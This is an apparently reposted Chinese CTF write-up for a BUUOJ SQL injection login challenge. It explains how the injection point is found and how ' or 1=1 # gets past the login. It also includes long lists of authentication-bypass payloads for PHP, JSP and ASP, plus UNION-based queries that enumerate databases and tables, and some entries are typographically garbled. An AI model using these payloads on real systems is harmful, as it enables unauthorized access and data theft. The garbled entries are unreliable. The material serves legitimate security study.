打开靶机会显示输入账号密码,根据提示猜测本题属于SQL注入题目,随便输入账号密码,登陆后会跳转到http://34d7e92b-8ecc-4446-80c3-7be529a26f3e.node5.buuoj.cn:81/check.php?username=admin&password=admin
根据对应URL能够得出,本题属于GET传参的形式和数据库 进行交互,随便输入账号密码框分别输入1,1‘,1“能够发现存在字符型注入点。
当输入为1’时报错,根据判断结果确定为单引号闭合,使用万能密码表:
账号 'or 1=1 #
密码随便输
(或者账号随便输入,密码为'or 1=1 #)
即可获得FLAG
验证语句一般为
select * from table_name where username='admin' or 1=1#' and password ='xxx'
PHP万能密码:
' or 1=1#
User:anything
Password:' or 1=1#
JSP万能密码:
1' or '1' = '1
admin' or 1=1
万能密码演示:
select 信息 from users where username='1' or 1=1 # ' and password = '输入的密码
select 信息 from users where username= '1' union select database() # ’and password= '输入的密码
select 信息 from users where username= '1' union select table_name from information_schema.tables # ' and password = “ 输入的密码
| asp | aspx万能密码 |
| "or “a” = "a | |
| ') or ('a' ='a | |
| or 1=1 -- | |
| or 1=1– | |
| a' or 1=1-- | |
| " or 1=1-- | |
| ' or 'a' = 'a | |
| " or "a' = 'a | |
| ' or " =' | |
| 'or' = 'or' | |
| admin' or 1=1# | |
| 1 or '1'='1'=1 | |
| 1 or '1'='1' or 1=1 | |
| ' or 1=1%00 | |
| " or 1=1%00 |
| php | PHP万能密码 |
| 'or 1=1/* "or “a”="a "or 1=1– “or”=" “or”="a’='a "or1=1– “or=or” '‘or’=‘or’ ') or (‘a’='a ‘.).or.(’.a.’=’.a 'or 1=1 'or 1=1– 'or 1=1/* ‘or"="a’='a ‘or’ ‘1’=‘1’ ‘or’’=’ ‘or’’=’‘or’’=’ ‘or’=‘1’ ‘or’=‘or’ 'or.‘a.’='a 'or1=1– 1’or’1’='1 a’or’ 1=1– a’or’1=1– or ‘a’=‘a’ or 1=1– or1=1– |
————————————————
转载原文链接:https://blog.csdn.net/emdog/article/details/120878215
2509
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
